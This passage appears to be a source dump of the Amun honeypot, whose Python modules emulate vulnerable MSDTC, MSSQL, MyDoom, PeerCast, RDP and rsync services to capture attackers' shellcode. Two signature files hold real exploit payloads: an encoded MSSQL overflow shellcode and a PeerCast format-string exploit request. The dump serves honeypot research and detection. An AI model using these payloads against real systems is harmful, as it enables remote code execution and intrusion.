 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import msdtc_shellcodes
 21 | 
 22 | class vuln:
 23 | 	def __init__(self):
 24 | 		try:
 25 | 			self.vuln_name = "MSDTC Vulnerability"
 26 | 			self.stage = "MSDTC_STAGE1"
 27 | 			self.welcome_message = ""
 28 | 			self.shellcode = []
 29 | 		except KeyboardInterrupt:
 30 | 			raise
 31 | 
 32 | 	def print_message(self, data):
 33 | 		print "\n"
 34 | 		counter = 1
 35 | 		for byte in data:
 36 | 			if counter==16:
 37 | 				ausg = hex(struct.unpack('B',byte)[0])
 38 | 				if len(ausg) == 3:
 39 | 					list = str(ausg).split('x')
 40 | 					ausg = "%sx0%s" % (list[0],list[1])
 41 | 					print ausg
 42 | 				else:
 43 | 					print ausg
 44 | 				counter = 0
 45 | 			else:
 46 | 				ausg = hex(struct.unpack('B',byte)[0])
 47 | 				if len(ausg) == 3:
 48 | 					list = str(ausg).split('x')
 49 | 					ausg = "%sx0%s" % (list[0],list[1])
 50 | 					print ausg,
 51 | 				else:
 52 | 					print ausg,
 53 | 			counter += 1
 54 | 		print "\n>> %s Incoming Codesize: %s\n\n" % (self.vuln_name, len(data))
 55 | 
 56 | 	def getVulnName(self):
 57 | 		return self.vuln_name
 58 | 
 59 | 	def getCurrentStage(self):
 60 | 		return self.stage
 61 | 
 62 | 	def getWelcomeMessage(self):
 63 |                 return self.welcome_message
 64 | 
 65 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 66 | 		try:
 67 | 			self.reply = random_reply[:62]
 68 | 			
 69 | 			resultSet = {}
 70 | 			resultSet['vulnname'] = self.vuln_name
 71 | 			resultSet['result'] = False
 72 | 			resultSet['accept'] = False
 73 | 			resultSet['shutdown'] = False
 74 | 			resultSet['reply'] = "None"
 75 | 			resultSet['stage'] = self.stage
 76 | 			resultSet['shellcode'] = "None"
 77 | 			resultSet["isFile"] = False
 78 | 
 79 | 			if self.stage=="MSDTC_STAGE1":
 80 | 				#self.print_message( message )
 81 | 				resultSet['result'] = True
 82 | 				resultSet['accept'] = True
 83 | 				resultSet['reply'] = "".join(self.reply)
 84 | 				self.stage = "MSDTC_STAGE2"
 85 | 				return resultSet
 86 | 			elif self.stage=="MSDTC_STAGE2":
 87 | 				#self.print_message( message )
 88 | 				resultSet['result'] = True
 89 | 				resultSet['accept'] = True
 90 | 				self.reply[8] = "\x5c"
 91 | 				resultSet['reply'] = "".join(self.reply)
 92 | 				self.stage = "SHELLCODE"
 93 | 				return resultSet
 94 | 			elif self.stage=="SHELLCODE":
 95 | 				if bytes>0:
 96 | 					#print ".::[Amun - MSDTC] collecting shellcode: %s ::." % (bytes)
 97 | 					resultSet['result'] = True
 98 | 					resultSet['accept'] = True
 99 | 					#resultSet['reply'] = "".join(self.reply)
100 | 					self.shellcode.append(message)
101 | 					self.stage = "SHELLCODE"
102 | 					#resultSet['shellcode'] = "".join(self.shellcode)
103 | 					return resultSet
104 | 				else:
105 | 					#print ".::[Amun - MSDTC] finish collecting shellcode (bytes %s) ::." % (bytes)
106 | 					resultSet['result'] = False
107 | 					resultSet['accept'] = True
108 | 					self.reply[8] = "\x5c"
109 | 					resultSet['reply'] = "".join(self.reply)
110 | 					self.shellcode.append(message)
111 | 					resultSet['shellcode'] = "".join(self.shellcode)
112 | 					return resultSet
113 | 			else:
114 | 				resultSet['result'] = False
115 | 				resultSet['accept'] = False
116 | 				resultSet['reply'] = "None"
117 | 				return resultSet
118 | 			return resultSet
119 | 		except KeyboardInterrupt:
120 | 			raise
121 | 		except StandardError, e:
122 | 			print e
123 | 			return resultSet
124 | 		except:
125 | 			print "MSDTC FATAL ERROR!"
126 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-msdtc/msdtc_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | msdtc_request_stage1 = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xe0\x0c\x6b\x90\x0b\xc7\x67\x10\xb3\x17\x00\xdd\x01\x06\x62\xda\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
4 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-msmq/msmq_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-msmq/msmq_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-mssql/mssql_modul.py.old:
--------------------------------------------------------------------------------
  1 | import psyco ; psyco.full()
  2 | from psyco.classes import *
  3 | 
  4 | import struct
  5 | import random
  6 | import mssql_shellcodes
  7 | 
  8 | class vuln:
  9 | 
 10 | 	def __init__(self):
 11 | 		try:
 12 | 			self.vuln_name = "MSSQL Vulnerability"
 13 | 			self.stage = "MSSQL_STAGE1"
 14 | 			self.welcome_message = ""
 15 | 			self.shellcode = []
 16 | 		except KeyboardInterrupt:
 17 | 			raise
 18 | 
 19 | 	def print_message(self, data):
 20 | 		print "\n"
 21 | 		counter = 1
 22 | 		for byte in data:
 23 | 			if counter==16:
 24 | 				ausg = hex(struct.unpack('B',byte)[0])
 25 | 				if len(ausg) == 3:
 26 | 					list = str(ausg).split('x')
 27 | 					ausg = "%sx0%s" % (list[0],list[1])
 28 | 					print ausg
 29 | 				else:
 30 | 					print ausg
 31 | 				counter = 0
 32 | 			else:
 33 | 				ausg = hex(struct.unpack('B',byte)[0])
 34 | 				if len(ausg) == 3:
 35 | 					list = str(ausg).split('x')
 36 | 					ausg = "%sx0%s" % (list[0],list[1])
 37 | 					print ausg,
 38 | 				else:
 39 | 					print ausg,
 40 | 			counter += 1
 41 | 		print "\n>> %s: Incoming Codesize: %s\n\n" % (self.vuln_name, len(data))
 42 | 
 43 | 	def getVulnName(self):
 44 | 		return self.vuln_name
 45 | 
 46 | 	def getCurrentStage(self):
 47 | 		return self.stage
 48 | 
 49 | 	def getWelcomeMessage(self):
 50 |                 return self.welcome_message
 51 | 
 52 | 	def incoming(self, message, bytes, ip):
 53 | 		try:
 54 | 			self.reply = []
 55 | 			for i in range(0,510):
 56 | 				try:
 57 | 					self.reply.append(struct.pack("B", random.randint(0,255)))
 58 | 				except KeyboardInterrupt:
 59 | 					raise
 60 | 			resultSet = {}
 61 | 			resultSet['vulnname'] = self.vuln_name
 62 | 			resultSet['result'] = False
 63 | 			resultSet['accept'] = False
 64 | 			resultSet['shutdown'] = False
 65 | 			resultSet['reply'] = "None"
 66 | 			resultSet['stage'] = self.stage
 67 | 			resultSet['shellcode'] = "None"
 68 | 
 69 | 			if self.stage=="MSSQL_STAGE1" and bytes == 41:
 70 | 				resultSet['result'] = True
 71 | 				resultSet['accept'] = True
 72 | 				resultSet['reply'] = "".join(self.reply)
 73 | 				self.stage = "MSSQL_STAGE2"
 74 | 				return resultSet
 75 | 			elif self.stage=="MSSQL_STAGE2":
 76 | 				resultSet['result'] = False
 77 | 				resultSet['accept'] = False
 78 | 				#self.reply[9] = "\x00"
 79 | 				#resultSet['reply'] = "".join(self.reply)
 80 | 				#self.stage = "MSSQL_STAGE3"
 81 | 				self.print_message( message )
 82 | 				return resultSet
 83 | 			elif self.stage=="MSSQL_STAGE3" and bytes==104:
 84 | 				if mssql_shellcodes.mssql_request_stage3==message:
 85 | 					resultSet['result'] = True
 86 | 					resultSet['accept'] = True
 87 | 					resultSet['reply'] = "".join(self.reply)
 88 | 					self.stage = "MSSQL_STAGE4"
 89 | 					return resultSet
 90 | 			elif self.stage=="MSSQL_STAGE4" and bytes==160:
 91 | 				if mssql_shellcodes.mssql_request_stage4==message:
 92 | 					resultSet['result'] = True
 93 | 					resultSet['accept'] = True
 94 | 					resultSet['reply'] = "".join(self.reply)
 95 | 					self.stage = "SHELLCODE"
 96 | 					return resultSet
 97 | 			elif self.stage=="SHELLCODE":
 98 | 				if bytes>0:
 99 | 					#print ".::[Amun - MSSQL] collecting shellcode: %s ::." % (bytes)
100 | 					resultSet['result'] = True
101 | 					resultSet['accept'] = True
102 | 					resultSet['reply'] = "".join(self.reply)
103 | 					self.shellcode.append(message)
104 | 					self.stage = "SHELLCODE"
105 | 					resultSet['shellcode'] = "".join(self.shellcode)
106 | 					return resultSet
107 | 				else:
108 | 					#print ".::[Amun - MSSQL] finish collecting shellcode (bytes %s) ::." % (bytes)
109 | 					resultSet['result'] = False
110 | 					resultSet['accept'] = True
111 | 					resultSet['reply'] = "None"
112 | 					self.shellcode.append(message)
113 | 					resultSet['shellcode'] = "".join(self.shellcode)
114 | 					return resultSet
115 | 			else:
116 | 				resultSet['result'] = False
117 | 				resultSet['accept'] = False
118 | 				resultSet['reply'] = "None"
119 | 				return resultSet
120 | 			return resultSet
121 | 		except KeyboardInterrupt:
122 | 			raise
123 | 		except StandardError, e:
124 | 			print e
125 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mssql/mssql_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | mssql_request_stage1="\x12\x01\x00\x29\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x01\x03\x00\x1d\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x00\xf0\x05\x00\x00"
3 | 
4 | 
5 | mssql_request_stage_original = "\x04THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC\xdc\xc9\xb0\x42\xeb\x0eJCTHC!\x01\x70\xae\x42\x01\x70\xae\x42\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5"
6 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mydoom/mydoom_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import mydoom_shellcodes
 21 | 
 22 | class vuln:
 23 | 	def __init__(self):
 24 | 		try:
 25 | 			self.vuln_name = "MYDOOM Vulnerability"
 26 | 			self.stage = "MYDOOM_STAGE1"
 27 | 			self.welcome_message = ""
 28 | 			self.shellcode = []
 29 | 		except KeyboardInterrupt:
 30 | 			raise
 31 | 
 32 | 	def print_message(self, data):
 33 | 		print "\n"
 34 | 		counter = 1
 35 | 		for byte in data:
 36 | 			if counter==16:
 37 | 				ausg = hex(struct.unpack('B',byte)[0])
 38 | 				if len(ausg) == 3:
 39 | 					list = str(ausg).split('x')
 40 | 					ausg = "%sx0%s" % (list[0],list[1])
 41 | 					print ausg
 42 | 				else:
 43 | 					print ausg
 44 | 				counter = 0
 45 | 			else:
 46 | 				ausg = hex(struct.unpack('B',byte)[0])
 47 | 				if len(ausg) == 3:
 48 | 					list = str(ausg).split('x')
 49 | 					ausg = "%sx0%s" % (list[0],list[1])
 50 | 					print ausg,
 51 | 				else:
 52 | 					print ausg,
 53 | 			counter += 1
 54 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 55 | 
 56 | 	def getVulnName(self):
 57 | 		return self.vuln_name
 58 | 
 59 | 	def getCurrentStage(self):
 60 | 		return self.stage
 61 | 
 62 | 	def getWelcomeMessage(self):
 63 |                 return self.welcome_message
 64 | 
 65 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 66 | 		try:
 67 | 			self.reply = []
 68 | 			for i in range(0,62):
 69 | 				try:
 70 | 					self.reply.append("\x00")
 71 | 				except KeyboardInterrupt:
 72 | 					raise
 73 | 			resultSet = {}
 74 | 			resultSet['vulnname'] = self.vuln_name
 75 | 			resultSet['result'] = False
 76 | 			resultSet['accept'] = False
 77 | 			resultSet['shutdown'] = False
 78 | 			resultSet['reply'] = "None"
 79 | 			resultSet['stage'] = self.stage
 80 | 			resultSet['shellcode'] = "None"
 81 | 			resultSet['isFile'] = False
 82 | 
 83 | 			if self.stage=="MYDOOM_STAGE1" and bytes==5:
 84 | 				if mydoom_shellcodes.mydoom_request_stage1==message:
 85 | 					resultSet['result'] = True
 86 | 					resultSet['accept'] = True
 87 | 					self.stage = "SHELLCODE"
 88 | 					return resultSet
 89 | 			elif self.stage=="MYDOOM_STAGE1" and (bytes==1024 or bytes==541 or bytes==645):
 90 | 				resultSet['result'] = True
 91 | 				resultSet['accept'] = True
 92 | 				#resultSet['reply'] = "".join(self.reply)
 93 | 				self.shellcode.append(message)
 94 | 				self.stage = "SHELLCODE"
 95 | 				#resultSet['shellcode'] = "".join(self.shellcode)
 96 | 				return resultSet
 97 | 			elif self.stage=="MYDOOM_STAGE1" and message.startswith('GET'):
 98 | 				resultSet['result'] = False
 99 | 				resultSet['accept'] = True
100 | 				resultSet['shutdown'] = True
101 | 				self.stage = "SHELLCODE"
102 | 				return resultSet
103 | 			elif self.stage=="SHELLCODE":
104 | 				if bytes>0:
105 | 					resultSet['result'] = True
106 | 					resultSet['accept'] = True
107 | 					#resultSet['reply'] = "".join(self.reply)
108 | 					self.shellcode.append(message)
109 | 					self.stage = "SHELLCODE"
110 | 					#resultSet['shellcode'] = "".join(self.shellcode)
111 | 					return resultSet
112 | 				else:
113 | 					resultSet['result'] = False
114 | 					resultSet['accept'] = True
115 | 					resultSet['isFile'] = True
116 | 					resultSet['reply'] = "None"
117 | 					self.shellcode.append(message)
118 | 					resultSet['shellcode'] = "".join(self.shellcode)
119 | 					return resultSet
120 | 			else:
121 | 				resultSet['result'] = False
122 | 				resultSet['accept'] = False
123 | 				resultSet['reply'] = "None"
124 | 				return resultSet
125 | 			return resultSet
126 | 		except KeyboardInterrupt:
127 | 			raise
128 | 		except StandardError, e:
129 | 			print e
130 | 			return resultSet
131 | 		except:
132 | 			print "MYDOOM FATAL ERROR!"
133 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mydoom/mydoom_shellcodes.py:
--------------------------------------------------------------------------------
1 | mydoom_request_stage1 = "\x85\x13\x3c\x9e\xa2"
2 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mysql/mysql_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-mysql/mysql_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-peercast/peercast_modul.py:
--------------------------------------------------------------------------------
  1 | try:
  2 | 	import psyco ; psyco.full()
  3 | 	from psyco.classes import *
  4 | except ImportError:
  5 | 	pass
  6 | 
  7 | import traceback
  8 | import StringIO
  9 | import sys
 10 | import struct
 11 | import amun_logging
 12 | import random
 13 | import peercast_shellcodes
 14 | 
 15 | class vuln(object):
 16 | 	__slots__ = ("vuln_name", "stage", "welcome_message", "shellcode", "reply", "log_obj")
 17 | 
 18 | 	def __init__(self):
 19 | 		try:
 20 | 			self.vuln_name = "PeerCast Vulnerability"
 21 | 			self.stage = "SHELLCODE"
 22 | 			self.welcome_message = ""
 23 | 			self.shellcode = []
 24 | 		except KeyboardInterrupt:
 25 | 			raise
 26 | 
 27 | 	def print_message(self, data):
 28 | 		print "\n"
 29 | 		counter = 1
 30 | 		for byte in data:
 31 | 			if counter==16:
 32 | 				ausg = hex(struct.unpack("B",byte)[0])
 33 | 				if len(ausg) == 3:
 34 | 					list = str(ausg).split("x")
 35 | 					ausg = "%sx0%s" % (list[0],list[1])
 36 | 					print ausg
 37 | 				else:
 38 | 					print ausg
 39 | 				counter = 0
 40 | 			else:
 41 | 				ausg = hex(struct.unpack("B",byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split("x")
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg,
 46 | 				else:
 47 | 					print ausg,
 48 | 			counter += 1
 49 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 50 | 
 51 | 	def getVulnName(self):
 52 | 		return self.vuln_name
 53 | 
 54 | 	def getCurrentStage(self):
 55 | 		return self.stage
 56 | 
 57 | 	def getWelcomeMessage(self):
 58 | 		return self.welcome_message
 59 | 
 60 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 61 | 		try:
 62 | 			### logging object
 63 | 			self.log_obj = amun_logging.amun_logging("vuln_peercast", vuLogger)
 64 | 			### construct standard reply
 65 | 			self.reply = random_reply
 66 | 			### prepare default resultSet
 67 | 			resultSet = {}
 68 | 			resultSet["vulnname"] = self.vuln_name
 69 | 			resultSet["accept"] = False
 70 | 			resultSet["result"] = False
 71 | 			resultSet["shutdown"] = False
 72 | 			resultSet["reply"] = "None"
 73 | 			resultSet["stage"] = self.stage
 74 | 			resultSet["shellcode"] = "None"
 75 | 			resultSet["isFile"] = False
 76 | 
 77 | 			if self.stage == "SHELLCODE" and bytes==233 and message==peercast_shellcodes.stage1:
 78 | 					resultSet["result"] = False
 79 | 					resultSet["accept"] = True
 80 | 					resultSet["reply"] = "".join(self.reply)
 81 | 					self.shellcode.append(message)
 82 | 					resultSet["shellcode"] = "".join(self.shellcode)
 83 | 					self.stage = "SHELLCODE"
 84 | 					return resultSet
 85 | 			else:
 86 | 				resultSet["result"] = False
 87 | 				resultSet["accept"] = False
 88 | 				resultSet["reply"] = "None"
 89 | 				return resultSet
 90 | 			return resultSet
 91 | 		except KeyboardInterrupt:
 92 | 			raise
 93 | 		except StandardError, e:
 94 | 			print e
 95 | 			f = StringIO.StringIO()
 96 | 			traceback.print_exc(file=f)
 97 | 			print f.getvalue()
 98 | 			sys.exit(1)
 99 | 		except:
100 | 			print "PeerCast fatal error"
101 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-peercast/peercast_shellcodes.py:
--------------------------------------------------------------------------------
1 | stage1 = 'GET /html/en/index.html\x9c\xda\t\x08\x9d\xda\t\x08\x9e\xda\t\x08\x9f\xda\t\x08%280x%1265$n%374x%1266$n%251x%1267$n%156x%1268$nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU1\xc9\x83\xe9\xeb\xd9\xee\xd9t$\xf4[\x81s\x13\x85O\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6%\xc8\xb5\xe3\x17SVd\x82JI\xc6\x1d\xac\xb7\x94\x13\xac\x8c\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07_5)\x1b<H\xcf\x98\x8d\xd3\x0cC>5)\x07_\x16%\xc8\x865p\x07_\xcc63o\x8e\x1d\xa2\xf0\xaa<\xa2\xb7\xaa-\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07_\r\n\r\n\r\n'
2 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-rdp/rdp_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import amun_logging
 20 | import random
 21 | import rdp_shellcodes
 22 | import sys
 23 | 
 24 | sys.path.append("../../core")
 25 | import amun_rdp_core
 26 | 
 27 | class vuln:
 28 | 	def __init__(self):
 29 | 		try:
 30 | 			self.vuln_name = "RDP Vulnerability"
 31 | 			self.stage = "RDP_STAGE1"
 32 | 			self.welcome_message = ""
 33 | 			self.shellcode = []
 34 | 			self.rdpHandler = amun_rdp_core.amun_rdp_prot()
 35 | 		except KeyboardInterrupt:
 36 | 			raise
 37 | 
 38 | 	def print_message(self, data):
 39 | 		print "\n"
 40 | 		counter = 1
 41 | 		for byte in data:
 42 | 			if counter==16:
 43 | 				ausg = hex(struct.unpack("B",byte)[0])
 44 | 				if len(ausg) == 3:
 45 | 					list = str(ausg).split("x")
 46 | 					ausg = "%sx0%s" % (list[0],list[1])
 47 | 					print ausg
 48 | 				else:
 49 | 					print ausg
 50 | 				counter = 0
 51 | 			else:
 52 | 				ausg = hex(struct.unpack("B",byte)[0])
 53 | 				if len(ausg) == 3:
 54 | 					list = str(ausg).split("x")
 55 | 					ausg = "%sx0%s" % (list[0],list[1])
 56 | 					print ausg,
 57 | 				else:
 58 | 					print ausg,
 59 | 			counter += 1
 60 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 61 | 
 62 | 	def getVulnName(self):
 63 | 		return self.vuln_name
 64 | 
 65 | 	def getCurrentStage(self):
 66 | 		return self.stage
 67 | 
 68 | 	def getWelcomeMessage(self):
 69 | 		return self.welcome_message
 70 | 
 71 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 72 | 		try:
 73 | 			self.log_obj = amun_logging.amun_logging("vuln_rdp", vuLogger)
 74 | 
 75 | 			### construct standard reply
 76 | 			self.reply = []
 77 | 			for i in range(0,510):
 78 | 				try:
 79 | 					self.reply.append("\x00")
 80 | 				except KeyboardInterrupt:
 81 | 					raise
 82 | 
 83 | 			### prepare default resultSet
 84 | 			resultSet = {}
 85 | 			resultSet["vulnname"] = self.vuln_name
 86 | 			resultSet["accept"] = False
 87 | 			resultSet["result"] = False
 88 | 			resultSet["shutdown"] = False
 89 | 			resultSet["reply"] = "None"
 90 | 			resultSet["stage"] = self.stage
 91 | 			resultSet["shellcode"] = "None"
 92 | 			resultSet["isFile"] = False
 93 | 
 94 | 
 95 | 			#self.print_message(message)
 96 | 			#self.log_obj.log("Incoming: %s" % (message), 6, "debug", True, False)
 97 | 
 98 | 			if self.stage == "RDP_STAGE1" and bytes>=len(self.welcome_message):
 99 | 				reply, code = self.rdpHandler.consume(message, ownIP)
100 | 				if reply!=None:
101 | 					resultSet['reply'] = reply+'*'
102 | 				else:
103 | 					return resultSet
104 | 
105 | 				resultSet["result"] = True
106 | 				resultSet["accept"] = True
107 | 				self.stage = "SHELLCODE"
108 | 				return resultSet
109 | 			elif self.stage == "SHELLCODE":
110 | 				if bytes>0:
111 | 					#print "shellcode bytes>0"
112 | 					reply, code = self.rdpHandler.consume(message, ownIP)
113 | 					if reply!=None:
114 | 						resultSet['reply'] = reply+'*'
115 | 						resultSet["result"] = True
116 | 						resultSet["accept"] = True
117 | 						self.stage = "SHELLCODE"
118 | 					return resultSet
119 | 				else:
120 | 					#print "shellcode else"
121 | 					resultSet["result"] = False
122 | 					resultSet["accept"] = True
123 | 					resultSet["reply"] = "None"
124 | 					self.shellcode.append(message)
125 | 					resultSet["shellcode"] = "".join(self.shellcode)
126 | 					return resultSet
127 | 			else:
128 | 				resultSet["result"] = False
129 | 				resultSet["accept"] = False
130 | 				resultSet["reply"] = "None"
131 | 				return resultSet
132 | 			return resultSet
133 | 		except KeyboardInterrupt:
134 | 			raise
135 | 		except StandardError, e:
136 | 			print e
137 | 		except:
138 | 			print "RDP fatal error"
139 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-rdp/rdp_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-rdp/rdp_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-rsync/rsync_modul.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import struct
19 | import random
20 | import rsync_shellcodes
21 | 
22 | class vuln:
23 | 	def __init__(self):
24 | 		try:
25 | 			self.vuln_name = "RSYNC Vulnerability"
26 | 			self.stage = "SHELLCODE"
27 | 			self.welcome_message = "Rsync:25"
28 | 			self.shellcode = []
29 | 		except KeyboardInterrupt:
30 | 			raise
31 | 
32 | 	def getVulnName(self):
33 | 		return self.vuln_name
34 | 
35 | 	def getCurrentStage(self):
36 | 		return self.stage
37 | 
38 | 	def getWelcomeMessage(self):
39 | 		return self.welcome_message
40 | 
41 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
42 | 		try:
43 | 			### construct standard reply
44 | 			self.reply = random_reply
45 | 
46 | 			### prepare default resultSet
47 | 			resultSet = {}
48 | 			resultSet["vulnname"] = self.vuln_name
49 | 			resultSet["accept"] = False
50 | 			resultSet["result"] = False
51 | 			resultSet["shutdown"] = False
52 | 			resultSet["reply"] = "None"
53 | 			resultSet["stage"] = self.stage
54 | 			resultSet["shellcode"] = "None"
55 | 			resultSet["isFile"] = False
56 | 
57 | 			if self.stage == "SHELLCODE":
58 | 				if bytes>0:
59 | 					resultSet["result"] = True
60 | 					resultSet["accept"] = True
61 | 					resultSet["reply"] = "".join(self.reply)
62 | 					self.shellcode.append(message)
63 | 					self.stage = "SHELLCODE"
64 | 					return resultSet
65 | 				else:
66 | 					resultSet["result"] = False
67 | 					resultSet["accept"] = True
68 | 					resultSet["reply"] = "None"
69 | 					self.shellcode.append(message)
70 | 					resultSet["shellcode"] = "".join(self.shellcode)
71 | 					return resultSet
72 | 			else:
73 | 				resultSet["result"] = False
74 | 				resultSet["accept"] = False
75 | 				resultSet["reply"] = "None"
76 | 				return resultSet
77 | 			return resultSet
78 | 		except KeyboardInterrupt:
79 | 			raise
80 | 		except StandardError, e:
81 | 			print e
82 | 		except:
83 | 			print "RSYNC fatal error"
84 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-rsync/rsync_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-rsync/rsync_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-sasserftpd/sasserftpd_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
